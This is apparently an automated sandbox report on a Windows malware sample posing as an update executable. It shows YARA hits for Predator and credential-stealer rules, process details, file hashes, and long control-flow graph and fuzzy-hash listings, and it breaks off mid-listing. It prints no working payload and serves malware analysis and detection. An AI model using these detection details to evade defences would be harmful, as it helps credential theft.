                                                                                                              • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:10:05:33
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\update_222410.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                                                                                                              Imagebase:0x790000
                                                                                                              File size:547374 bytes
                                                                                                              MD5 hash:0D43B051C7C73233C85697219BC9A4F4
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:10:05:37
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\update_222410.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                                                                                                              Imagebase:0x6e0000
                                                                                                              File size:547374 bytes
                                                                                                              MD5 hash:0D43B051C7C73233C85697219BC9A4F4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:low

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:18%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:3
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 10336 7ff9a63b8c44 10337 7ff9a63b8c4d LoadLibraryW 10336->10337 10339 7ff9a63b8cfd 10337->10339

                                                                                                                Executed Functions

                                                                                                                Function 00007FF9A63BEB81 Relevance: 3.3, Strings: 2, Instructions: 824COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 7ff9a63beb81-7ff9a63beb85 1 7ff9a63beb87 0->1 2 7ff9a63beb8d 0->2 1->2 3 7ff9a63beb90-7ff9a63beba1 2->3 4 7ff9a63beb8f 2->4 5 7ff9a63beba4-7ff9a63bec58 call 7ff9a63bdd10 3->5 6 7ff9a63beba3 3->6 4->3 12 7ff9a63bec5a-7ff9a63bec63 5->12 13 7ff9a63bec7e-7ff9a63bec87 5->13 6->5 12->13 15 7ff9a63bec89-7ff9a63bec99 13->15 16 7ff9a63becae-7ff9a63becb1 13->16 15->16 18 7ff9a63bed04-7ff9a63bed07 16->18 19 7ff9a63becb3-7ff9a63becb8 16->19 20 7ff9a63bed49-7ff9a63bed4c 18->20 21 7ff9a63bed09-7ff9a63bed19 call 7ff9a63be9d0 18->21 22 7ff9a63becea-7ff9a63bed03 19->22 23 7ff9a63becba-7ff9a63becd1 19->23 25 7ff9a63bed4e-7ff9a63bed5b call 7ff9a63be8e0 20->25 26 7ff9a63bed5d-7ff9a63bed66 20->26 21->20 31 7ff9a63bed1b-7ff9a63bed44 21->31 22->18 23->22 33 7ff9a63becd3-7ff9a63becd6 23->33 25->26 35 7ff9a63bed68-7ff9a63bed91 25->35 26->35 46 7ff9a63bf0a7-7ff9a63bf0bd 31->46 36 7ff9a63becdc-7ff9a63bece5 33->36 37 7ff9a63bf0be-7ff9a63bf0d9 33->37 45 7ff9a63bed97-7ff9a63bed98 35->45 41 7ff9a63befe3-7ff9a63beff5 36->41 47 7ff9a63bf0e0-7ff9a63bf14d 37->47 48 7ff9a63bed9f-7ff9a63beda1 45->48 76 7ff9a63bf154-7ff9a63bf180 47->76 49 7ff9a63befa7-7ff9a63befaa 48->49 50 7ff9a63beda7-7ff9a63bedbb 48->50 52 7ff9a63beff6-7ff9a63bf024 49->52 53 7ff9a63befac-7ff9a63befc8 49->53 57 7ff9a63bedc1-7ff9a63bedd7 50->57 58 7ff9a63bf26a-7ff9a63bf29a 50->58 63 7ff9a63bf077-7ff9a63bf07c 52->63 64 7ff9a63bf026-7ff9a63bf02a 52->64 53->52 74 7ff9a63befca-7ff9a63befd4 53->74 66 7ff9a63bee0b-7ff9a63bee1f 57->66 67 7ff9a63bedd9-7ff9a63bedeb 57->67 71 7ff9a63bf2a1-7ff9a63bf2c6 58->71 72 7ff9a63bf29c 58->72 75 7ff9a63bf083-7ff9a63bf098 63->75 70 7ff9a63bf02d-7ff9a63bf03e 64->70 66->58 83 7ff9a63bee25-7ff9a63bee36 call 7ff9a63be8e0 66->83 67->66 81 7ff9a63beded-7ff9a63bedf7 67->81 80 7ff9a63bf040-7ff9a63bf055 70->80 72->71 74->76 77 7ff9a63befda-7ff9a63befe1 74->77 98 7ff9a63bf182-7ff9a63bf1ef 76->98 99 7ff9a63bf1f6-7ff9a63bf240 76->99 77->41 87 7ff9a63bf059-7ff9a63bf05e 80->87 81->47 84 7ff9a63bedfd-7ff9a63bee06 81->84 92 7ff9a63bee38-7ff9a63bee55 83->92 93 7ff9a63bee5a-7ff9a63beedb 83->93 84->41 90 7ff9a63bf099-7ff9a63bf0a4 87->90 91 7ff9a63bf060-7ff9a63bf06f 87->91 90->46 91->87 100 7ff9a63bf071-7ff9a63bf075 91->100 108 7ff9a63beedd-7ff9a63beee0 92->108 93->108 98->99 99->58 100->63 100->70 108->49 109 7ff9a63beee6-7ff9a63beef3 108->109 113 7ff9a63beef6-7ff9a63bef0b 109->113 118 7ff9a63bef0d-7ff9a63bef11 113->118 120 7ff9a63bef83-7ff9a63bef8f 118->120 121 7ff9a63bef13-7ff9a63bef1a 118->121 120->75 124 7ff9a63bef1c-7ff9a63bef51 call 7ff9a63bdd10 121->124 134 7ff9a63bef94-7ff9a63befa2 124->134 135 7ff9a63bef53-7ff9a63bef64 124->135 134->46 136 7ff9a63bef66-7ff9a63bef7b 135->136 139 7ff9a63bef7d-7ff9a63bef81 136->139 139->120 139->124
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586263140.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63bd000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `_I$7__L
                                                                                                                • API String ID: 0-571641856
                                                                                                                • Opcode ID: eb054d0ea0ca992926c8a49c287c91b11d2d1a989737b5ea5723809452761c6a
                                                                                                                • Instruction ID: acc22af7c65823e63997c84a498d4c8fe63626965de494025ca45f44a74f07ba
                                                                                                                • Opcode Fuzzy Hash: eb054d0ea0ca992926c8a49c287c91b11d2d1a989737b5ea5723809452761c6a
                                                                                                                • Instruction Fuzzy Hash: 7D320671A1DE094FEB58EB2C98497B877D1EF99B50F0441BEE44EC7292DE64BC028781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63BD68D Relevance: 1.2, Instructions: 1229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586263140.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63bd000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d9324ee57c4100f91c12deed42433714a3c5cfa9126edf7a1544911080727f9
                                                                                                                • Instruction ID: abc4a42badadf80284d1e004f4e9bfa2995b59b4ab960623528e3a47c0de22e1
                                                                                                                • Opcode Fuzzy Hash: 7d9324ee57c4100f91c12deed42433714a3c5cfa9126edf7a1544911080727f9
                                                                                                                • Instruction Fuzzy Hash: C172F321A1DE4A4FF758EB2CA4597B837D1EFD5B50F1444BAE49DCB282DD68B8038381
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B41C0 Relevance: .6, Instructions: 612COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1408 7ff9a63b41c0-7ff9a63b41d5 1409 7ff9a63b4213-7ff9a63b4227 1408->1409 1410 7ff9a63b41d7-7ff9a63b41f6 1408->1410 1411 7ff9a63b4228-7ff9a63b4272 1410->1411 1412 7ff9a63b41f8-7ff9a63b4212 1410->1412 1415 7ff9a63b4279-7ff9a63b4287 1411->1415 1416 7ff9a63b4274 call 7ff9a63b41c0 1411->1416 1417 7ff9a63b4291-7ff9a63b42a1 1415->1417 1418 7ff9a63b4289-7ff9a63b428f 1415->1418 1416->1415 1419 7ff9a63b42a3-7ff9a63b42a7 1417->1419 1418->1419 1420 7ff9a63b431b-7ff9a63b4326 1419->1420 1421 7ff9a63b42a9 1419->1421 1422 7ff9a63b45a5-7ff9a63b45b4 1420->1422 1423 7ff9a63b432c 1420->1423 1421->1422 1427 7ff9a63b4595-7ff9a63b459e 1422->1427 1428 7ff9a63b45b6-7ff9a63b45d9 call 7ff9a63b3288 call 7ff9a63b0458 1422->1428 1424 7ff9a63b42ae-7ff9a63b42d5 call 7ff9a63b3c60 1423->1424 1432 7ff9a63b42d7-7ff9a63b42e1 1424->1432 1433 7ff9a63b432e-7ff9a63b4336 1424->1433 1427->1422 1453 7ff9a63b45e0-7ff9a63b4634 call 7ff9a63b32c8 call 7ff9a63b0458 1428->1453 1436 7ff9a63b42e7-7ff9a63b42fc 1432->1436 1437 7ff9a63b453e-7ff9a63b4552 1432->1437 1438 7ff9a63b4338 1433->1438 1439 7ff9a63b433b-7ff9a63b4345 1433->1439 1441 7ff9a63b4302 1436->1441 1442 7ff9a63b4559-7ff9a63b4564 1436->1442 1437->1442 1438->1439 1443 7ff9a63b4352-7ff9a63b4356 1439->1443 1444 7ff9a63b4347-7ff9a63b4350 1439->1444 1445 7ff9a63b456a-7ff9a63b4593 call 7ff9a63b32d0 call 7ff9a63b0458 1441->1445 1442->1445 1447 7ff9a63b4307-7ff9a63b431a 1442->1447 1446 7ff9a63b435b-7ff9a63b435e 1443->1446 1444->1446 1445->1427 1450 7ff9a63b4364-7ff9a63b4371 1446->1450 1451 7ff9a63b4415-7ff9a63b441b 1446->1451 1455 7ff9a63b4377-7ff9a63b4382 1450->1455 1456 7ff9a63b4426-7ff9a63b4439 1450->1456 1452 7ff9a63b4421 1451->1452 1451->1453 1452->1450 1491 7ff9a63b463b-7ff9a63b468f call 7ff9a63b32d0 call 7ff9a63b0458 1453->1491 1457 7ff9a63b4384-7ff9a63b438b 1455->1457 1456->1457 1460 7ff9a63b4391-7ff9a63b4394 call 7ff9a63b34a0 1457->1460 1461 7ff9a63b443e-7ff9a63b4444 1457->1461 1468 7ff9a63b4399-7ff9a63b43b5 call 7ff9a63b3c60 1460->1468 1465 7ff9a63b4446-7ff9a63b4449 1461->1465 1469 7ff9a63b444b 1465->1469 1470 7ff9a63b43d0-7ff9a63b43d3 1465->1470 1479 7ff9a63b43bb-7ff9a63b43bf 1468->1479 1480 7ff9a63b4450-7ff9a63b4462 1468->1480 1469->1460 1473 7ff9a63b4481-7ff9a63b4498 call 7ff9a63b3498 1470->1473 1474 7ff9a63b43d9-7ff9a63b43e5 1470->1474 1485 7ff9a63b449d-7ff9a63b44d8 call 7ff9a63b3ab0 1473->1485 1474->1465 1481 7ff9a63b43e7-7ff9a63b43fb 1474->1481 1484 7ff9a63b43c1-7ff9a63b43c5 1479->1484 1480->1484 1481->1473 1493 7ff9a63b4401-7ff9a63b4410 call 7ff9a63b3c60 1481->1493 1486 7ff9a63b4467-7ff9a63b4472 1484->1486 1487 7ff9a63b43cb 1484->1487 1499 7ff9a63b44e5-7ff9a63b44f1 1485->1499 1500 7ff9a63b44da-7ff9a63b44e0 1485->1500 1486->1491 1492 7ff9a63b4478-7ff9a63b447b 1486->1492 1487->1491 1513 7ff9a63b4696-7ff9a63b4733 call 7ff9a63b32d0 call 7ff9a63b0458 1491->1513 1492->1473 1492->1474 1493->1432 1505 7ff9a63b44f3-7ff9a63b44f9 1499->1505 1506 7ff9a63b44ff-7ff9a63b4509 1499->1506 1500->1499 1505->1432 1505->1506 1508 7ff9a63b4516-7ff9a63b451a 1506->1508 1509 7ff9a63b450b-7ff9a63b4514 1506->1509 1511 7ff9a63b451f-7ff9a63b4522 1508->1511 1509->1511 1512 7ff9a63b4528-7ff9a63b4533 1511->1512 1511->1513 1512->1513 1514 7ff9a63b4539 1512->1514 1527 7ff9a63b473a-7ff9a63b4743 1513->1527 1528 7ff9a63b4735 call 7ff9a63b3c60 1513->1528 1514->1424 1529 7ff9a63b4745-7ff9a63b474c 1527->1529 1530 7ff9a63b474d-7ff9a63b4755 1527->1530 1528->1527 1531 7ff9a63b4757 1530->1531 1532 7ff9a63b475a-7ff9a63b477a call 7ff9a63b34f0 1530->1532 1531->1532 1535 7ff9a63b478b-7ff9a63b4799 call 7ff9a63b34b0 1532->1535 1536 7ff9a63b477c-7ff9a63b477f call 7ff9a63b34b8 1532->1536 1539 7ff9a63b4784-7ff9a63b478a 1536->1539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65e1f8e6c15e1850fdb6555bd459d69968687a938527fa5ede0be67fa73bb36a
                                                                                                                • Instruction ID: 05d6d3570781756e05b4fbc7843dd63e96372df97226131130c44a0eeb073254
                                                                                                                • Opcode Fuzzy Hash: 65e1f8e6c15e1850fdb6555bd459d69968687a938527fa5ede0be67fa73bb36a
                                                                                                                • Instruction Fuzzy Hash: 49021F21A0DA5A5AE358DA28904937977C1EFC5B14F1405BEF8EEC71D3DEA8BC438385
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63CA1A9 Relevance: .6, Instructions: 564COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1541 7ff9a63ca1a9-7ff9a63ca1dc 1543 7ff9a63ca226-7ff9a63ca257 1541->1543 1544 7ff9a63ca1de-7ff9a63ca20a 1541->1544 1550 7ff9a63ca25e-7ff9a63ca273 1543->1550 1551 7ff9a63ca259 1543->1551 1545 7ff9a63ca211-7ff9a63ca221 1544->1545 1546 7ff9a63ca20c 1544->1546 1545->1543 1546->1545 1552 7ff9a63ca275 1550->1552 1553 7ff9a63ca27a-7ff9a63ca28f 1550->1553 1551->1550 1552->1553 1554 7ff9a63ca296-7ff9a63ca2ab 1553->1554 1555 7ff9a63ca291 1553->1555 1556 7ff9a63ca2b2-7ff9a63ca2c7 1554->1556 1557 7ff9a63ca2ad 1554->1557 1555->1554 1558 7ff9a63ca2ce-7ff9a63ca2e3 1556->1558 1559 7ff9a63ca2c9 1556->1559 1557->1556 1560 7ff9a63ca2e5 1558->1560 1561 7ff9a63ca2ea-7ff9a63ca2ff 1558->1561 1559->1558 1560->1561 1562 7ff9a63ca306-7ff9a63ca31b 1561->1562 1563 7ff9a63ca301 1561->1563 1564 7ff9a63ca322-7ff9a63ca337 1562->1564 1565 7ff9a63ca31d 1562->1565 1563->1562 1566 7ff9a63ca33e-7ff9a63ca353 1564->1566 1567 7ff9a63ca339 1564->1567 1565->1564 1568 7ff9a63ca355 1566->1568 1569 7ff9a63ca35a-7ff9a63ca392 1566->1569 1567->1566 1568->1569 1572 7ff9a63ca708-7ff9a63ca710 1569->1572 1573 7ff9a63ca398-7ff9a63ca3dc 1569->1573 1574 7ff9a63ca711-7ff9a63ca712 1572->1574 1577 7ff9a63ca3e3-7ff9a63ca3ea 1573->1577 1578 7ff9a63ca3de 1573->1578 1579 7ff9a63ca3f1-7ff9a63ca459 1577->1579 1580 7ff9a63ca3ec 1577->1580 1578->1577 1585 7ff9a63ca460-7ff9a63ca533 1579->1585 1586 7ff9a63ca45b 1579->1586 1580->1579 1594 7ff9a63ca585-7ff9a63ca597 1585->1594 1595 7ff9a63ca535-7ff9a63ca541 1585->1595 1586->1585 1597 7ff9a63ca59e-7ff9a63ca59f 1594->1597 1598 7ff9a63ca599 1594->1598 1599 7ff9a63ca5a1-7ff9a63ca5b3 1595->1599 1600 7ff9a63ca543-7ff9a63ca55d 1595->1600 1597->1599 1598->1597 1602 7ff9a63ca605-7ff9a63ca620 1599->1602 1603 7ff9a63ca5b5-7ff9a63ca5bc 1599->1603 1604 7ff9a63ca5be-7ff9a63ca5c1 1600->1604 1605 7ff9a63ca55f-7ff9a63ca57a 1600->1605 1606 7ff9a63ca621-7ff9a63ca636 call 7ff9a63c5e28 1602->1606 1603->1604 1604->1606 1607 7ff9a63ca5c3-7ff9a63ca5dd 1604->1607 1605->1594 1614 7ff9a63ca638 1606->1614 1615 7ff9a63ca63d 1606->1615 1612 7ff9a63ca63e-7ff9a63ca690 call 7ff9a63c5e28 1607->1612 1613 7ff9a63ca5df-7ff9a63ca5fa 1607->1613 1620 7ff9a63ca701-7ff9a63ca702 call 7ff9a63c5e68 1612->1620 1621 7ff9a63ca692-7ff9a63ca695 1612->1621 1613->1602 1614->1615 1615->1612 1624 7ff9a63ca703 1620->1624 1621->1574 1623 7ff9a63ca697 1621->1623 1625 7ff9a63ca6de 1623->1625 1626 7ff9a63ca699-7ff9a63ca6b2 1623->1626 1629 7ff9a63ca704 1624->1629 1627 7ff9a63ca6b4-7ff9a63ca6b6 1625->1627 1628 7ff9a63ca6e0-7ff9a63ca6e1 1625->1628 1626->1627 1633 7ff9a63ca6b7 1627->1633 1634 7ff9a63ca732-7ff9a63ca734 1627->1634 1630 7ff9a63ca6f3-7ff9a63ca700 1628->1630 1631 7ff9a63ca6e3-7ff9a63ca6f0 1628->1631 1636 7ff9a63ca707 1629->1636 1630->1620 1631->1630 1637 7ff9a63ca728-7ff9a63ca72f 1633->1637 1638 7ff9a63ca6b8-7ff9a63ca6bb 1633->1638 1635 7ff9a63ca737-7ff9a63ca761 1634->1635 1639 7ff9a63ca768-7ff9a63ca786 1635->1639 1640 7ff9a63ca763 1635->1640 1636->1572 1637->1634 1638->1635 1641 7ff9a63ca6bd 1638->1641 1643 7ff9a63ca797-7ff9a63ca7a7 1639->1643 1644 7ff9a63ca788-7ff9a63ca792 1639->1644 1640->1639 1641->1629 1645 7ff9a63ca6bf-7ff9a63ca6c7 1641->1645 1647 7ff9a63ca7ae-7ff9a63ca7bd 1643->1647 1648 7ff9a63ca7a9 1643->1648 1646 7ff9a63ca822-7ff9a63ca82d 1644->1646 1650 7ff9a63ca6cd-7ff9a63ca6dd 1645->1650 1649 7ff9a63ca809-7ff9a63ca815 1647->1649 1648->1647 1651 7ff9a63ca817-7ff9a63ca820 1649->1651 1652 7ff9a63ca7bf-7ff9a63ca7c5 1649->1652 1650->1625 1651->1646 1653 7ff9a63ca7c7 1652->1653 1654 7ff9a63ca7cc-7ff9a63ca7d8 1652->1654 1653->1654 1655 7ff9a63ca7df-7ff9a63ca7ff 1654->1655 1656 7ff9a63ca7da 1654->1656 1657 7ff9a63ca806 1655->1657 1658 7ff9a63ca801 1655->1658 1656->1655 1657->1649 1658->1657
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e20bd625ad4e99ab731c7aaeb7d5fdf41c8ae3e064dd3c446e3926898dd573b9
                                                                                                                • Instruction ID: 704999758720a917d971cab838827940492172b4ca5129304b0365c7565a1ba1
                                                                                                                • Opcode Fuzzy Hash: e20bd625ad4e99ab731c7aaeb7d5fdf41c8ae3e064dd3c446e3926898dd573b9
                                                                                                                • Instruction Fuzzy Hash: 79128030D09A5A8FEB94EF68C454BE9B7B1FF59300F1085B9E05DD7296CE78A885CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C2CF6 Relevance: .5, Instructions: 477COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1659 7ff9a63c2cf6-7ff9a63c2d03 1660 7ff9a63c2d05-7ff9a63c2d0d 1659->1660 1661 7ff9a63c2d0e-7ff9a63c2dd7 1659->1661 1660->1661 1665 7ff9a63c2e43 1661->1665 1666 7ff9a63c2dd9-7ff9a63c2de2 1661->1666 1668 7ff9a63c2e45-7ff9a63c2e6a 1665->1668 1666->1665 1667 7ff9a63c2de4-7ff9a63c2df0 1666->1667 1669 7ff9a63c2df2-7ff9a63c2e04 1667->1669 1670 7ff9a63c2e29-7ff9a63c2e41 1667->1670 1674 7ff9a63c2ed6 1668->1674 1675 7ff9a63c2e6c-7ff9a63c2e75 1668->1675 1672 7ff9a63c2e08-7ff9a63c2e1b 1669->1672 1673 7ff9a63c2e06 1669->1673 1670->1668 1672->1672 1676 7ff9a63c2e1d-7ff9a63c2e25 1672->1676 1673->1672 1678 7ff9a63c2ed8-7ff9a63c2f80 1674->1678 1675->1674 1677 7ff9a63c2e77-7ff9a63c2e83 1675->1677 1676->1670 1679 7ff9a63c2e85-7ff9a63c2e97 1677->1679 1680 7ff9a63c2ebc-7ff9a63c2ed4 1677->1680 1689 7ff9a63c2f82-7ff9a63c2f8c 1678->1689 1690 7ff9a63c2fee 1678->1690 1681 7ff9a63c2e9b-7ff9a63c2eae 1679->1681 1682 7ff9a63c2e99 1679->1682 1680->1678 1681->1681 1684 7ff9a63c2eb0-7ff9a63c2eb8 1681->1684 1682->1681 1684->1680 1689->1690 1691 7ff9a63c2f8e-7ff9a63c2f9b 1689->1691 1692 7ff9a63c2ff0-7ff9a63c3019 1690->1692 1693 7ff9a63c2fd4-7ff9a63c2fec 1691->1693 1694 7ff9a63c2f9d-7ff9a63c2faf 1691->1694 1699 7ff9a63c3083 1692->1699 1700 7ff9a63c301b-7ff9a63c3026 1692->1700 1693->1692 1695 7ff9a63c2fb3-7ff9a63c2fc6 1694->1695 1696 7ff9a63c2fb1 1694->1696 1695->1695 1698 7ff9a63c2fc8-7ff9a63c2fd0 1695->1698 1696->1695 1698->1693 1701 7ff9a63c3085-7ff9a63c3116 1699->1701 1700->1699 1702 7ff9a63c3028-7ff9a63c3036 1700->1702 1710 7ff9a63c311c-7ff9a63c312b 1701->1710 1703 7ff9a63c3038-7ff9a63c304a 1702->1703 1704 7ff9a63c306f-7ff9a63c3081 1702->1704 1705 7ff9a63c304c 1703->1705 1706 7ff9a63c304e-7ff9a63c3061 1703->1706 1704->1701 1705->1706 1706->1706 1708 7ff9a63c3063-7ff9a63c306b 1706->1708 1708->1704 1711 7ff9a63c3133-7ff9a63c3198 call 7ff9a63c31b4 1710->1711 1712 7ff9a63c312d 1710->1712 1719 7ff9a63c319a 1711->1719 1720 7ff9a63c319f-7ff9a63c31b3 1711->1720 1712->1711 1719->1720
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c64f4274fa114f01c7f50655ef46df40ddc6c055d4f7c321ab30420a74be9144
                                                                                                                • Instruction ID: 2180017e9a55a613cdf389fe4b9f577451c938f12f68ed14bb4b8b6cbb34aeec
                                                                                                                • Opcode Fuzzy Hash: c64f4274fa114f01c7f50655ef46df40ddc6c055d4f7c321ab30420a74be9144
                                                                                                                • Instruction Fuzzy Hash: AFF1C530909A8D8FEBA8DF28D8457E937E1FF55710F04826EE85DC7291CF74A9458B82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63CD2E7 Relevance: .5, Instructions: 476COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7b5e7b31c6a20e7bf459f00632c0bf2e53f1d767bad2e465993e8aea180fc7e
                                                                                                                • Instruction ID: 9ab39878ed1f5ccb0aba842a6a84f5ad40dd360707ad9ef77add5a4434cd7193
                                                                                                                • Opcode Fuzzy Hash: b7b5e7b31c6a20e7bf459f00632c0bf2e53f1d767bad2e465993e8aea180fc7e
                                                                                                                • Instruction Fuzzy Hash: 7602AE34C0AA5A8EEB69DB14C8557E9B7B0FF55B00F0001BAF49DD3191DE747A5ACB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C3AA2 Relevance: .5, Instructions: 463COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7abd4dcae050cb32a3f4503895cf2f13a313919d67f8a7c4bbd572a3514023e
                                                                                                                • Instruction ID: 2f63633f308ebfe5018ed47cbee6fb3006469e07d790df5ed66214dd72f26569
                                                                                                                • Opcode Fuzzy Hash: d7abd4dcae050cb32a3f4503895cf2f13a313919d67f8a7c4bbd572a3514023e
                                                                                                                • Instruction Fuzzy Hash: 51E1C330909A8D8FEBA8DF28D8557EA37E1FF55710F04826EE85DC7291CF74A8458B81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C5E5D Relevance: 2.4, Strings: 1, Instructions: 1155COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 140 7ff9a63c5e5d-7ff9a63c5e69 141 7ff9a63c5eb4-7ff9a63c5ed5 140->141 142 7ff9a63c5e6b-7ff9a63c5e6e 140->142 145 7ff9a63c5ed7-7ff9a63c5eda 141->145 146 7ff9a63c5ed6 141->146 142->141 148 7ff9a63c5edc-7ff9a63c5ef1 145->148 149 7ff9a63c5f3a-7ff9a63c5fac 145->149 146->145 148->146 155 7ff9a63c5ef3-7ff9a63c5f16 148->155 162 7ff9a63c5ff6-7ff9a63c604f 149->162 163 7ff9a63c5fae-7ff9a63c5fe5 149->163 167 7ff9a63c5f18-7ff9a63c5f34 155->167 176 7ff9a63c6051 162->176 177 7ff9a63c6056-7ff9a63c605d 162->177 165 7ff9a63c5fe7 163->165 166 7ff9a63c5fec-7ff9a63c5ff5 163->166 165->166 166->162 175 7ff9a63c5f36-7ff9a63c5f39 167->175 175->149 176->177 178 7ff9a63c6064-7ff9a63c60cc 177->178 179 7ff9a63c605f 177->179 184 7ff9a63c60d3-7ff9a63c612a 178->184 185 7ff9a63c60ce 178->185 179->178 188 7ff9a63c6131-7ff9a63c621f 184->188 189 7ff9a63c612c 184->189 185->184 199 7ff9a63c6221 188->199 200 7ff9a63c6226-7ff9a63c62e3 188->200 189->188 199->200 207 7ff9a63c62e5 200->207 208 7ff9a63c62ea-7ff9a63c637e 200->208 207->208 214 7ff9a63c6380-7ff9a63c6388 208->214 215 7ff9a63c638d-7ff9a63c63b3 208->215 218 7ff9a63c6c5b-7ff9a63c6c64 214->218 221 7ff9a63c63b5-7ff9a63c63c8 215->221 222 7ff9a63c640c-7ff9a63c642d 215->222 228 7ff9a63c63cf-7ff9a63c6405 221->228 225 7ff9a63c6435-7ff9a63c6546 222->225 226 7ff9a63c642f-7ff9a63c6430 222->226 261 7ff9a63c654d 225->261 227 7ff9a63c654e-7ff9a63c67e6 call 7ff9a63c5ba0 call 7ff9a63c5ba8 call 7ff9a63c5bb0 call 7ff9a63c5bb8 call 